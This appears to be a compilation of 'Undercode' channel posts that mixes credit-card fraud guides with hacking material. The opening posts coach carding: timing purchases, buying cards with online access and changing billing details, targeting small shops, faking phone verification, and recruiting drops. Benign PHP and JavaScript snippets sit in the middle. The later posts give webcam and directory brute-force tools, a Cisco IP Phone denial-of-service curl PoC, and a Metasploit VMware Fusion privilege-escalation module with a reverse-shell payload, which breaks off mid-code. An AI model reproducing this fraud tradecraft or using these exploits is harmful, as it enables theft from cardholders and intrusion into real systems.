▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CARDING TRICK 5 -xd this one posted on depweb by undercode-for secure yourself :
> Successful virtual clothing combing skills
t.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Open your imagination and make your purchases approved by more and more stores. For example, remember that Americans usually shop for lunch or evening. This means that if you make a purchase at this time, it will first cause more trust. Second, hundreds of Americans will make purchases with you at the same time, and store employees cannot actually verify all the data. Also, pay attention to the Christmas holidays (or any other holidays)
er holidays).

> Thousands of people want to buy gifts for their loved ones or themselves. People buy various new and old products, which are both expensive and cheap. The online store should hire other workers who are not familiar with the verification system + they will not suspect that you are fraud. But when shopping on holidays, please remember that your order can only be approved within a few days. During this period, the cardholder will have time to see the loss of money, contact the bank and credit card will be blocked, and your order will not be sent.

2) Another tip is that you need to carefully choose a credit card for the online store. Your credit card must match the country (and sometimes even the city). In this case, you can give full play to your creativity and come up with an interesting story, want to give gifts to relatives living in the same country (city) as you.

3) I also recommend that you purchase a credit card that can be accessed online. Using the information you purchased, you can go to the cardholder ’s personal account and change all the data you need (bill address, phone number, email).

4) If the billing and shipping addresses match, the store will have no doubt that you are the cardholder and approve your order almost immediately. But it is also important to understand that the bank may not change your billing address, or the holder will see the changed information and block the credit card.

5) Choose the online store correctly. Check if it has the factors you need, size, delivery method, etc. You should not place orders in a huge market because they are likely to have an excellent anti-fraud system. It is best to choose a small online store where a few of the workers will not suspect that you are a liar. Buyers do not usually shop in such online stores, so store owners cannot hire qualified personnel to track shoppers ’purchases.

6) If the store suspects that you are a real cardholder, online support can use the phone to query all necessary information or ask you to scan your credit card. Experienced seniors know that with a small amount of money, they can hire someone who scans credit cards, and it looks just as convincing as the original.

7) But you have to solve the problem by phone yourself. You have several ways to solve this problem: let your phone call through the phone instead of you, or find someone else who agrees to make fake calls. Don't forget to give him CC and warn to speak on behalf of another person. If you want to call yourself, you need to dial a virtual phone number. This can be done using Skype. Do n’t forget that the phone code must match the country code drop. Also, make sure you do n’t give stress or even some details.

🦑 As Australia and New Zealand are far from another world, online shopping has become very popular there. The online store without any problems accepts orders and sends packages around the world. But there are also difficulties. For example, the rarity of Australian or New Zealand cards in the market. Moreover, they are much more expensive than ordinary CCs because they are more difficult to obtain.
Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CARDING DROPPING NOW 🙈:
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

»Congratulations, your order has been sent! But this is not all the problems that need to be solved. The fact that the store sends the package does not mean that it is in your hands. It happened that the police caught your fall, or he / she turned out to be a scam. Therefore, the correct descent must be selected, which will perfectly complete his / her work.

🦑 There are two recruitment methods:

1) Warn him that you are a virtual truck, illegal orders will come to him. At first glance, this method has no advantage, because few people will agree to participate in the carding process. But in fact, everything is different. If descent agrees, he will correctly understand the nature of his work and you will be able to ask him / her to help you. For example, he can call support and introduce himself as a cardholder.

2) Don't tell anything. He would think that he participated in absolutely legal procedures and would not raise any other questions. According to my personal experience, this has many disadvantages rather than advantages. The drop will accidentally handle the package + cannot help you anyway. For example, there is a situation when Card sends a package to Blob. Dropped out of home, the package was sent back to the store. Of course, Card did n’t get his package and could n’t order again. The money is lost.

» In some cases, when the package is received, but the address is wrong when sending, and the sender did not receive the package.

🦑 Virtual combing is still profitable

1) Although there are many problems with virtual combing, it is still a very profitable income. You can solve all the obstacles placed by banks and shops if you pay a little money or think
enough.

2) You need to understand that the results of combing do not depend on the anti-fraud system, but on the store employees who approve your order. His decision can always be changed through a long story, because it is a gift from your wife, or important to you for other reasons. But if you get a stubborn worker, then you are powerless. Never forget the human factor, if things don't succeed, don't be discouraged. It will operate next time.

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 LET S START SOME PHP TUTORIALS BY UNDERCODE-FAST TIPS

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install phpmyadmin under Linux? BY UNDERCODE


1) When installing fedora, select the basic components that should be selected, including Appache, mysql, and php, but when we manage the database, it is still more convenient to have a graphical interface, so we install phpmyadmin ourselves , The installation is very simple.

2) phpMyAdmin is a MySQL management tool that manages MySQL directly from the web.

3) Assuming your web (webpage storage) root directory is / var / www / assuming your host web access is like this http://192.168.1.11/

4) You can install it to / var / www / phpmyadmin or of course any subordinate directory of / var / www /

Note that the name of this directory is best known only to the administrator. Therefore, we assume / var / www / onlyyouknow

A. First go to the official website of phpMyAdmin to download the latest phpMyAdmin program

http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.11.3-all-languages.tar.gz

Download phpMyAdmin-2.11.3-all-languages.tar.bz2 to / var / www /

#cd / var / www /

#wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.11.3-all-languages.tar.gz

Of course, you can also go to your own windows machine, and later upload it to the web server after editing it

B. Unzip this file

# tar zxvf phpMyAdmin-2.11.3-all-languages.tar.gz

At this time the path /var/www/phpMyAdmin-2.11.3-all-languages

C. Change the directory name to / var / www / onlyyoukown

# mv /var/www/phpMyAdmin-2.11.3-all-languages / var / www / onlyyoukown

D. Modify the configuration file

1. Find the /libraries/config.default.php file (copy config.default.php to the phpmyadmin directory, and then rename it to config.inc.php), the file has the following items (2-8) must be configured by yourself Wordpad (do not use Notepad, this is UTF8 encoding) for editing, directly edit with vim under linux.

2. Find $ cfg ['PmaAbsoluteUri'] and change it to the phpMyAdmin URL that you will upload to the space

For example: $ cfg ['PmaAbsoluteUri'] = 'http://192.168.1.11/onlyyouknow/';

3. Find $ cfg ['Servers'] [$ i] ['host'] = 'localhost'; (usually use the default, there are exceptions, you can not modify)

4. Find $ cfg ['Servers'] [$ i] ['auth_type'] = 'config';

Use config for debugging in your own machine; if you use cookies in the space on the network, since we have added the URL in the front, we will modify it to a cookie. Here we recommend using cookies.

5. Find $ cfg ['Servers'] [$ i] ['user'] = 'root'; // MySQL user (mysql user name, use root in your machine;)

6. Find $ cfg ['Servers'] [$ i] ['password'] = ''; // MySQL password (mysql user's password, his server is generally the password of the mysql user root)

7. Find $ cfg ['Servers'] [$ i] ['only_db'] = ''; // If set to a db-name, only (set it if you only have one data; if you are on this machine Set up the server, it is recommended to leave it blank)

8. Find $ cfg ['DefaultLang'] = 'zh'; (Here is the choice of language, zh stands for Simplified Chinese, I do n’t know whether to fill in gbk or not)

9. Save after setting

If “The configuration file now requires the top secret phrase password (blowfish_secret)”, then please set the cookie of your website in the equal sign of $ cfg ['blowfish_secret'] = ''; Any character '; This is because of your "$ cfg [' Servers'] [$ i] ['auth_type'] = 'cookie'.

E. Test

Open the browser, http://192.168.1.11/onlyyoukown/

A little personal opinion

We think that it is not a very safe way to control mysql through the root user of mysql from the web. So my suggestion is that if it is your own server, you can put the phpadmin directory into a directory that the web cannot access when you run out. Use it to move the entire directory back to its original location with the mv command.

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Forward something Php guide by Undercode :
twitter.com/undercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


<style type="text/css">
body {
background-color: #D4D0C8;
}
.m_fieldset {
padding: 0,10,5,10;
text-align: center;
width: 150px;
}
.m_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.m_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
width: 100px;
height: 19px;
background-color: #FFFFFF;
overflow: hidden;
text-align: right;
font-family: "Tahoma";
font-size: 10px;
}
.m_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.m_input {
width: 18px;
height: 14px;
border: 0px solid black;
font-family: "Tahoma";
font-size: 9px;
text-align: right;
ime-mode:disabled;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/15
function minute(name,fName)
{
this.name = name;
this.fName = fName || "m_input";
this.timer = null;
this.fObj = null;

this.toString = function()
{
var objDate = new Date();
var sMinute_Common = "class=\"m_input\" maxlength=\"2\" name=\""+this.fName+"\" onfocus=\""+this.name+".setFocusObj(this)\" onblur=\""+this.name+".setTime(this)\" onkeyup=\""+this.name+".prevent(this)\" onkeypress=\"if (!/[0-9]/.test(String.fromCharCode(event.keyCode)))event.keyCode=0\" onpaste=\"return false\" ondragenter=\"return false\"";
var sButton_Common = "class=\"m_arrow\" onfocus=\"this.blur()\" onmouseup=\""+this.name+".controlTime()\" disabled"
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">"
str += "<tr>"
str += "<td>"
str += "<div class=\"m_frameborder\">"
str += "<input radix=\"24\" value=\""+this.formatTime(objDate.getHours())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getMinutes())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getSeconds())+"\" "+sMinute_Common+">"
str += "</div>"
str += "</td>"
str += "<td>"
str += "<table border=\"0\" cellspacing=\"2\" cellpadding=\"0\">"
str += "<tr><td><button id=\""+this.fName+"_up\" "+sButton_Common+">5</button></td></tr>"
str += "<tr><td><button id=\""+this.fName+"_down\" "+sButton_Common+">6</button></td></tr>"
str += "</table>"
str += "</td>"
str += "</tr>"
str += "</table>"
return str;
}
this.play = function()
{
this.timer = setInterval(this.name+".playback()",1000);
}
this.formatTime = function(sTime)
{
sTime = ("0"+sTime);
return sTime.substr(sTime.length-2);
}
this.playback = function()
{
var objDate = new Date();
var arrDate = [objDate.getHours(),objDate.getMinutes(),objDate.getSeconds()];
var objMinute = document.getElementsByName(this.fName);
for (var i=0;i<objMinute.length;i++)
{
objMinute[i].value = this.formatTime(arrDate[i])
}
}
this.prevent = function(obj)
{
clearInterval(this.timer);
this.setFocusObj(obj);
var value = parseInt(obj.value,10);
var radix = parseInt(obj.radix,10)-1;
if (obj.value>radix||obj.value<0)
{
obj.value = obj.value.substr(0,1);
}
}
this.controlTime = function(cmd)
{
event.cancelBubble = true;
if (!this.fObj) return;
clearInterval(this.timer);
var cmd = event.srcElement.innerText=="5"?true:false;
var i = parseInt(this.fObj.value,10);
var radix = parseInt(this.fObj.radix,10)-1;
if (i==radix&&cmd)
{
i = 0;
}
else if (i==0&&!cmd)
{
i = radix;
}
else
{
cmd?i++:i--;
}
this.fObj.value = this.formatTime(i);
this.fObj.select();
}
this.setTime = function(obj)
{
obj.value = this.formatTime(obj.value);
}
this.setFocusObj = function(obj)
{
eval(this.fName+"_up").disabled = eval(this.fName+"_down").disabled = false;
this.fObj = obj;
}
this.getTime = function()
{
var arrTime = new Array(2);
for (var i=0;i<document.getElementsByName(this.fName).length;i++)
{
arrTime[i] = document.getElementsByName(this.fName)[i].value;
}
return arrTime.join(":");
}
}
</script>

<style type="text/css">
body {
background-color: #D4D0C8;
}
.c_fieldset {
padding: 0,10,5,10;
text-align: center;
width: 180px;
}
.c_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.c_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
background-color: #FFFFFF;
overflow: hidden;
font-family: "Tahoma";
font-size: 10px;
width:160px;
height:120px;
}
.c_frameborder td {
width: 23px;
height: 16px;
font-family: "Tahoma";
font-size: 11px;
text-align: center;
cursor: default;
}
.c_frameborder .selected {
background-color:#0A246A;
width:12px;
height:12px;
color:white;
}
.c_frameborder span {
width:12px;
height:12px;
}
.c_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.c_year {
font-family: "Tahoma";
font-size: 11px;
cursor: default;
width:55px;
height:19px;
}
.c_month {
width:75px;
height:20px;
font:11px "Tahoma";
}
.c_dateHead {
background-color:#808080;
color:#D4D0C8;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/16
function calendar(name,fName)
{
this.name = name;
this.fName = fName || "calendar";
this.year = new Date().getFullYear();
this.month = new Date().getMonth();
this.date = new Date().getDate();
//private
this.toString = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"3\" cellpadding=\"0\" onselectstart=\"return false\">";
str += "<tr>";
str += "<td>";
str += this.drawMonth();
str += "</td>";
str += "<td align=\"right\">";
str += this.drawYear();
str += "</td>";
str += "</tr>";
str += "<tr>";
str += "<td colspan=\"2\">";
str += "<div class=\"c_frameborder\">";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" class=\"c_dateHead\">";
str += "<tr>";
str += "<td>日</td><td>一</td><td>二</td><td>三</td><td>四</td><td>五</td><td>六</td>";
str += "</tr>";
str += "</table>";
str += this.drawDate();
str += "</div>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//private
this.drawYear = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">";
str += "<tr>";
str += "<td>";
str += "<input class=\"c_year\" maxlength=\"4\" value=\""+this.year+"\" name=\""+this.fName+"\" id=\""+this.fName+"_year\" readonly>";
//DateField
str += "<input type=\"hidden\" name=\""+this.fName+"\" value=\""+this.date+"\" id=\""+this.fName+"_date\">";
str += "</td>";
str += "<td>";
str += "<table cellspacing=\"2\" cellpadding=\"0\" border=\"0\">";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value++;"+this.name+".redrawDate()\">5</button></td>";
str += "</tr>";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value--;"+this.name+".redrawDate()\">6</button></td>";
str += "</tr>";
str += "</table>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//priavate
this.drawMonth = function()
{
var aMonthName = ["一","二","三","四","五","六","七","八","九","十","十一","十二"];
var str = "";
str += "<select class=\"c_month\" name=\""+this.fName+"\" id=\""+this.fName+"_month\" onchange=\""+this.name+".redrawDate()\">";
for (var i=0;i<aMonthName.length;i++) {
str += "<option value=\""+(i+1)+"\" "+(i==this.month?"selected":"")+">"+aMonthName[i]+"月</option>";
}
str += "</select>";
return str;
}
//private
this.drawDate = function()
{
var str = "";
var fDay = new Date(this.year,this.month,1).getDay();
var fDate = 1-fDay;
var lDay = new Date(this.year,this.month+1,0).getDay();
var lDate = new Date(this.year,this.month+1,0).getDate();
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" id=\""+this.fName+"_dateTable"+"\">";
for (var i=1,j=fDate;i<7;i++)
{
str += "<tr>";
for (var k=0;k<7;k++)
{

str += "<td><span"+(j==this.date?" class=\"selected\"":"")+" onclick=\""+this.name+".redrawDate(this.innerText)\">"+(isDate(j++))+"</span></td>";
}
str += "</tr>";
}
str += "</table>";
return str;

function isDate(n)
{
return (n>=1&&n<=lDate)?n:"";
}
}
//public
this.redrawDate = function(d)
{
this.year = document.getElementById(this.fName+"_year").value;
this.month = document.getElementById(this.fName+"_month").value-1;
this.date = d || this.date;
document.getElementById(this.fName+"_year").value = this.year;
document.getElementById(this.fName+"_month").selectedIndex = this.month;
document.getElementById(this.fName+"_date").value = this.date;
if (this.date>new Date(this.year,this.month+1,0).getDate()) this.date = new Date(this.year,this.month+1,0).getDate();
document.getElementById(this.fName+"_dateTable").outerHTML = this.drawDate();
}
//public
this.getDate = function(delimiter)
{
if (!delimiter) delimiter = "/";
var aValue = [this.year,(this.month+1),this.date];
return aValue.join(delimiter);
}
}
</script>
<table border="0">
<tr><td>
<fieldset class="c_fieldset"><legend class="c_legend">日期(T)</legend>
<script>
var c = new calendar("c");
document.write(c);
</script>

</fieldset>
</td>
<td valign="top">
<fieldset class="m_fieldset"><legend class = "m_legend"> Time (T) </ legend> var m = new minute ("m"); <script>
><!-Call Time


m.play();
document.write(m);
</script>
</fieldset>
</td></tr>
<tr>
<td colspan="2">
<button onclick="alert(c.getDate())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetDate</button>

<button onclick="alert(m.getTime())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetTime</button>

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Those php guide by undercode is gpood for now let s send some termux-linux tips & some accounts

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Exploite Old webcam

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

What does the tool to? Look, a list!

> Search

> Brute force

> SSID and WPAPSK Password Disclosure

> E-mail, FTP, DNS, MSN Password Disclosure

> Exploit

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

cd /opt/

$ git clone https://github.com/fbctf/shodanwave.git

$ cd shodanwave

$ pip install -r requirements.txt

Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k
Shodan API key --t OUTPUT

python shodanwave.py --help

🦑Modify your Tsocks config!!

Add/Modify the following at the bottom:
server =
server_type = <4 or 5>
server_port =
default_pass = (Might be required for proxy)

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Easy way to brute-force web directory.


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


1) git clone https://github.com/abaykan/crawlbox.git

2) cd crawlbox/

3) pip install -r requirements.txt

python crawlbox.py -h
url specific target url, like domain.com
optional arguments:

-h, --help show this help message and exit
-v, --version show program's version number and exit
-w WORDLIST specific path to wordlist file
-d DELAY add delay between requests

🦑MacOSX
Kali Linux
Ubuntu 16.04

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑# Exploit Title: Cisco IP Phone 11.7 TESTED BY UNDERCODE ‼️


- Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24

curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VMWARE 2020 EXPLOIT TESTED BY UNDERCODE :
AVAIBLE AT DEEPWEB & EXPLOITE DB :


🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::OSX::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
'Description' => %q(
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
The Open VMware USB Arbitrator Service can be launched outide of its standard path
which allows loading of an attacker controlled binary. By creating a payload in the
user home directory in a specific folder, and creating a hard link to the 'Open VMware
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
discovered an incomplete patch in 11.5.3 with a TOCTOU race.
Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Dhanesh Kizhakkinan', # discovery
'Rich Mirch', # edb module
'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
'grimm'
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2020-3950' ],
[ 'EDB', '48235' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
[ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
[ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
],
'DisclosureDate' => 'Mar 17 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
'WfsDelay' => 15
}
)
)

register_options [
OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
]

register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end

def open_usb_service
'Open VMware USB Arbitrator Service'
end

def usb_service
'VMware USB Arbitrator Service'
end

def get_home_dir
home = cmd_exec 'echo ~'
if home.blank?
fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
end
home
end

def content_dir
"#{get_home_dir}/Contents"
end

def base_dir
"#{content_dir}/Library/services/"
end

def kill_process(executable)
pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
cmd_exec pid_kill
end

def get_version
# Thanks to @ddouhine on github for this answer!
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
if version_raw.blank?
fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
end
Gem::Version.new(version)
end

def pre_11_5_3
# Upload payload executable & chmod
payload_filename = "#{base_dir}#{usb_service}"
print_status "Uploading Payload: #{payload_filename}"
write_file payload_filename, generate_payload_exe
chmod payload_filename, 0o755
register_file_for_cleanup payload_filename

# create folder structure and hard link to the original binary
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
print_status "Created folder (#{link_folder}) and link"

print_status 'Starting USB Service (5 sec pause)'
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
Rex.sleep 5 # give time for the service to execute our payload
print_status 'Killing service'
cmd_exec "pkill '#{open_usb_service}'"
print_status "Deleting #{root_link_folder}"
rm_rf root_link_folder
end

def exactly_11_5_3
# Upload payload executable & chmod
payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
print_status "Uploading Payload to #{payload_name}"
write_file payload_name, generate_payload_exe
chmod payload_name, 0o755
#create race with codesign check
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
print_status 'Uploading race condition executable.'
race = <<~EOF
#!/bin/sh
while [ "1" = "1" ]; do
